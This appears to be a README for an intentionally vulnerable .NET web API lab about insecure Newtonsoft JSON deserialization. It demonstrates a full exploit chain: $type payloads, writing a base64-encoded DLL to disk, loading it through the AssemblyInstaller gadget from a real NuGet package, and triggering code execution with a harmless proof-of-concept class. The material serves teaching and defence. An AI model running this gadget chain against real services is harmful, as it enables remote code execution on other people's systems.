Example for a dotnet web api exposing JSON deserialization vulnerabilities.
Demo for Json deserialization vulnerability in a dotnet web api.
The main goal for this demo is for having a hands on, learning of basics, and understanding the (de)serialization exploitation process due to insecure configurations for the (de)Serializers.
Because of historic popularity, I've chosen to use for the demo the Json Serializer from NewtonSoft but this is not so relevant. The important part is identifying and understanding the configuration for the corresponding Serializer when type resolution/name-handling is enabled.
For a detailed information on .Net Deserializations Attacks, please, consider to read more on Alvaro Muñoz great work on the topic. Also consider visiting the YSoSerial.Net tool.
dotnet --version
Any browser
The vulnerable web api:
git clone https://github.com/arale61/VulnJsonWebApi.git
cd VulnJsonWebApi
cd VulnJsonWebApi
dotnet run
Check the port the dev web server is listening to in the output:
dotnet run
info: Microsoft.Hosting.Lifetime[14]
Now listening on: http://localhost:5052
info: Microsoft.Hosting.Lifetime[0]
Application started. Press Ctrl+C to shut down.
Browse to the http://locahost:PORT/swagger, in my example was http://localhost:5052/swagger but yours may vary, so check the PORT number:
You can try now to invoke the GET or POST requests for the WeatherForecast resource.
Having running the web api, make a GET Request with the swagger form:
Pay attention to the result json:
"$type": "VulnJsonWebApi.WeatherForecast[], VulnJsonWebApi",
"$values": [
"$type": "VulnJsonWebApi.WeatherForecast, VulnJsonWebApi",
"id": "bb2f68dc-b8e5-45e6-9e22-923cd924914d",
"date": "2023-08-01",
"temperatureC": -14,
"temperatureF": 7,
"summary": "Chilly",
"rawData": null
// ...
For the json objects there is a $type property specifying type information.
In this particular case, corresponds on the attribute that Newtonsoft is using for adding the type information required for deserializing back to an object. But other Serializers adopt similar strategies so just keep in mind the concept of specifying type information in the serialized version that later is used for constructing a new instance for that type, in the deserialization process.
.AddNewtonsoftJson((options) =>
options.SerializerSettings.TypeNameHandling = Newtonsoft.Json.TypeNameHandling.All;
In this particular case, Newtonsoft Json Serializer is using type name handling with the All setting, allowing the serializer to try to handle any requested type as far as it founds it loaded in memory. Other than None for this setting using Newtonsoft is considered insecure and needs to be used carefuly, probably acompanied with a white list of allowed types.
Checking at the Program.cs file for the web api project we can see the insecure configuration.
This configuration is specially insecure when the json serialized is managed or influenced by untrusted sources, as any http client.
In order to exploit the insecure configuration we need to find the chance for the Serializer to try to create an instance of a class we can take profit of, let's call all these family of classes, insecure classes for deserialization.
Playing a bit with the swagger api you can notice that the rawData for a WeatherForecast accepts any type or even object you send to it:
Sending the following:
"$type": "VulnJsonWebApi.WeatherForecast, VulnJsonWebApi",
"id": "bb2f68dc-b7e5-45e6-9e22-923cd924914d",
"date": "2023-08-01",
"temperatureC": -14,
"temperatureF": 7,
"summary": "Chilly",
"rawData": "String type for test"
Or, these one:
"$type": "VulnJsonWebApi.WeatherForecast, VulnJsonWebApi",
"id": "bb2f68dc-b7e5-45e6-9e22-923cd924915d",
"date": "2023-08-01",
"temperatureC": -14,
"temperatureF": 7,
"summary": "Chilly",
"rawData": {
"id": 0,
"name": "test"
All them work...
This may seem flexible or maybe is vulnerable.
If we try to create a child WeatherForecast object we see it works!:
"$type": "VulnJsonWebApi.WeatherForecast, VulnJsonWebApi",
"id": "bb2f68dc-b7e5-45f6-9e24-943cd924915d",
"date": "2023-08-01",
"temperatureC": -14,
"temperatureF": 7,
"summary": "Chilly Parent",
"rawData": {
"$type": "VulnJsonWebApi.WeatherForecast, VulnJsonWebApi",
"id": "bb2f68dc-b1e5-41e6-9e34-943cd924915e",
"date": "2023-08-01",
"temperatureC": -14,
"temperatureF": 7,
"summary": "Chilly Sub",
"rawData": {
"id": 0,
"name": "test Sub"
For simplicity reasons, I defined the rawData property in the WeatherForecast class as object. This will enable the Serializer to create any instance without dealing with error situations.
But keep in mind this placeholder or placehoder for using an insecure class for deserialization may not be in this form, there are other ways of misusing the serializer to serialize an object, for example, deserializing into an object and just after casting for a specific type, firing any exceptions, but it will already be too late, since the payload was executed at the moment the instance was created.
Now that we can try to trick the Serializer to create any instance we like, is time to find one of these insecure classes for serilization.
In the .Net Framework (not the case in dotnet or .net Core) there were quite number of insecure classes scattered in the framework. YSoSerial.Net generates payloads for lots of them, and for many different serializers and formatters.
These classes are not well suited in a insecure serialization context.
For example, take a look at the following class present in the web api:
This class presents some code in the setter for the Content property. In this case, the code will call another function SaveContent. Meaning that we can potentially use it for arbitrary remote writes.
Despite is a very obvious way to spot the problem, there are other forms that are not that clear, for example, in C#, classes implementing ISerializable and marked as [Serializable], need to implement a specific constructor and GetObjectData method for serialization support, check the class OtherBadConstructs as an example:
Even this class is not used in any part of the web api code is still in the dll and accessible by the Serializer with the mentioned settings.
Create an instance of VulnerableFileWrapper or OtherBadConstructs to create a text file in a temp folder
Try to build a json payload to create a text file.
This is not true.
Microsoft has put lot of effort on preventing these insecure implementations and design of classes in their domain area and packages. But There are other vendors and all them can publish on nuget their packages and share them to the community.
Or any developer may introduce these problems, and without knowing it, present this vulnerable surface.
Take as an example a nuget package I found some years ago, at early years for dotnet, still used today significally, called Core.System.Configuration.Install.
Stats while writing this Readme:
Total 721.9K
Current version 447.3K
Per day average 395
The Github Project Site describes it as a dotnet Core port of the System.Configuration.Install of full framework .NET 4.0.
System.Configuration.Install was a known insecure class for deserialization and now is available on dotnet (well, it has already been available for many years).
This class presents a gadget, a piece of code, that enables to load a random assembly into memory.
I've installed the package Core.System.Configuration.Install in the web api project.
It's not referenced in my user code, but is referenced as a nuget dependency.
You can try to follow these steps:
Build the AutoLoadClassLib, sorry for the name, is just a normal class library.
cd AutoLoadClassLib
dotnet build
Then, create the base64 encoded version:
cat bin/Debug/net7.0/AutoLoadClassLib.dll| base64 -w0> ./dolenta.dll.b64
Then, use that base64 (without newlines) to create this dll remotely, sending a POST to WeatherForecast resource using the rawData as a placeholder for creating a new VulnerableFileWrapper with the base64 as the content.
The web api should process the request as normally.
But now a dll has been been created on the specified path:
Now is time for using System.Configuration.Install.AssemblyInstaller to load our dll!
Create a new POST Request and this time use the System.Configuration.Install.AssemblyInstaller class, specifying a Path value that points to the newly created dll.
After doing this step, you could inspect the loaded dll's into the web api process and you will see that our newly created dll is loaded!
For example, in windows, you can use ListDlls from SysInternals for checking that the dll has been loaded:
~/.local/opt/ListDlls/Listdlls64.exe 22000 | grep -E '(Vuln|test)'
0x0000000013820000 0x8000 c:\\programdata\\test.dll
Verified: Unsigned
Publisher: AutoLoadClassLib
Description: AutoLoadClassLib
Product: AutoLoadClassLib
File version:
Create time: Mon Aug 02 17:17:21 2060
Now, the web api process has loaded into memory our dll that we just copied, abusing the (de)serialization process due to an insecure configuration.
If you did all the steps correctly, now if you invoke our class, in my sample, AutoLoadClassLib.Class1, from the loaded dll, AutoLoadClassLib, you will trigger some RCE.
Use the following json to invoke the class in our dummy class library in the rawData:
"$type": "AutoLoadClassLib.Class1, AutoLoadClassLib",
In windows you should see pop a Calculator, while in linux a new file /tmp/arale_was_here should be created.
This is the definition for AutoLoadClassLib.Class1:
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace AutoLoadClassLib
public class Class1
private int fire = 0;
public Class1()
public int Fire
get { return fire; }
fire = value;
if(value == 61)
if (RuntimeInformation.IsOSPlatform(OSPlatform.Linux))
File.WriteAllText("/tmp/arale_was_here", "arale61 was here");
else if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
throw new NotSupportedException("OS Platform not supported!");